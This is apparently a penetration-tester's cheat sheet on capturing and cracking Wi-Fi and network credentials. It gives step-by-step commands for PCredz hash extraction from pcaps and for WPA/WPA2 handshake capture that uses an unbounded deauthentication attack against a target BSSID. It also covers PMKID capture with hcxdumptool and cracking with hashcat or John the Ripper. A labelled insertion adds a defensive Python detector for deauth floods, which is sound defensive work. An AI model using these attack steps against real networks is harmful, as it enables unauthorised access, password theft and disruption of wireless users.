## PCREDZ (PCAP HASH EXTRACTION)
https://github.com/lgandx/PCredz
Extracts network authentication hashes from pcaps.
Extract hashes from a single pcap file:
```
Pcredz -f example.pcap
```
Extract hashes from multiple pcap files in a directory:
```
Pcredz -d /path/to/pcaps
```
Listen on an interface and extract hashes live from the traffic crossing it:
```
Pcredz -i eth0
```
## WPA/WPA2 PSK AUTHENTICATION
To crack WPA/WPA2 wireless access points you need to capture the 4-way WPA/WPA2
authentication handshake.
### AIRMON-NG / AIRODUMP-NG / AIREPLAY-NG
STEP 1: Create monitoring interface mon0 Ex) interface wlan0
```
airmon-ng start wlan0
```
STEP 2: Capture packets to file on target AP channel Ex) channel 11
```
airodump-ng mon0 --write capture.cap -c 11
```
STEP 3: Start deauth attack against BSSID Ex) bb:bb:bb:bb:bb:bb
```
aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
```
STEP 4: Wait for confirmation to appear at top of terminal:
```
CH 11 ][ Elapsed: 25 s ][<DATE / TIME>][ WPA handshake: **
```
STEP 5: Extract handshake into JOHN or HASHCAT format:
[[John The Ripper]] FORMAT EXTRACT
```
Step1: cap2hccap.bin -e '<ESSID>' capture.cap capture_out.hccap
Step2: hccap2john capture_out.hccap > jtr_capture
```
[[HashCat]] FORMAT EXTRACT
```
cap2hccapx.bin capture.cap capture_out.hccapx
```
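From the defender's side, the continuous deauthentication in STEP 3 shows up on a monitor-mode sensor as a sustained burst of deauth frames for one BSSID. The following is an added example, not part of the original page, that flags such bursts; the record format, window and threshold are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12                 # 802.11 management subtype: deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"

def sample_frames():
    """Constructed records: 'epoch_seconds subtype bssid destination' (assumed format)."""
    lines = ["100.00 8 bb:bb:bb:bb:bb:bb ff:ff:ff:ff:ff:ff"]            # beacon
    lines += [f"{101 + i * 0.25:.2f} 12 bb:bb:bb:bb:bb:bb {BROADCAST}"  # sustained burst
              for i in range(40)]
    lines.append("103.00 12 cc:cc:cc:cc:cc:cc 00:11:22:33:44:55")       # one ordinary deauth
    return lines

def parse(lines):
    """Turn sensor lines into (timestamp, subtype, bssid, destination) tuples."""
    for line in lines:
        ts, subtype, bssid, dst = line.split()
        yield float(ts), int(subtype), bssid.lower(), dst.lower()

def detect_deauth_flood(frames, window=5.0, threshold=20):
    """Report BSSIDs with >= threshold deauth frames inside any window-second span.

    Returns {bssid: {"peak": max frames seen in one window,
                     "broadcast": True if any counted frame targeted all clients}}.
    window and threshold are illustrative and need tuning per environment.
    """
    recent = defaultdict(deque)      # bssid -> (timestamp, destination) in the window
    alerts = {}
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype != DEAUTH_SUBTYPE:
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while ts - q[0][0] > window:  # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(bssid, {"peak": 0, "broadcast": False})
            alert["peak"] = max(alert["peak"], len(q))
            alert["broadcast"] |= any(d == BROADCAST for _, d in q)
    return alerts

if __name__ == "__main__":
    for bssid, info in detect_deauth_flood(parse(sample_frames())).items():
        print(f"deauth flood against {bssid}: {info}")
```

Where clients and the access point support 802.11w Protected Management Frames, forged deauthentication frames are discarded, so an alert like this on a PMF-enabled network mainly indicates an attempt rather than a successful disconnect.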
### WPA2 PMKID WIRELESS ATTACK
A newer attack avoids having to capture the 4-way handshake: it allows an
attacker to connect to a target WPA2 WiFi Access Point and retrieve the PMKID.
STEP 1: Install HCXTOOLS and use a wireless card capable of monitor mode:
```
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
```
STEP 2: Start your wireless card to listen for broadcasting access points and
locate the BSSID you want to target:
```
airodump-ng <interface>
```
STEP 3: Place your target BSSID (A0BB3A6F93) into a file 'bssid_target.txt' and
start 'hcxdumptool' to capture the PMKID:
```
hcxdumptool -i <interface> --filterlist=bssid_target.txt --filtermode=2 --enable_status=2 -o pmkid.pcap
```
STEP 4: With the target BSSID's PMKID captured, extract it into hashcat format
for cracking:
```
hcxpcaptool -z wpa2_pmkid_hash.txt pmkid.pcap
```
STEP 5: Start cracking with hashcat:
```
hashcat -a 0 -m 16800 -w 4 wpa2_pmkid_hash.txt dict.txt
```
### WIFITE ATTACK
### MISC WLAN TOOLS
[[HCXTOOLS]]: capture and convert packets from wlan devices for use with Hashcat.
https://github.com/ZerBea/hcxtools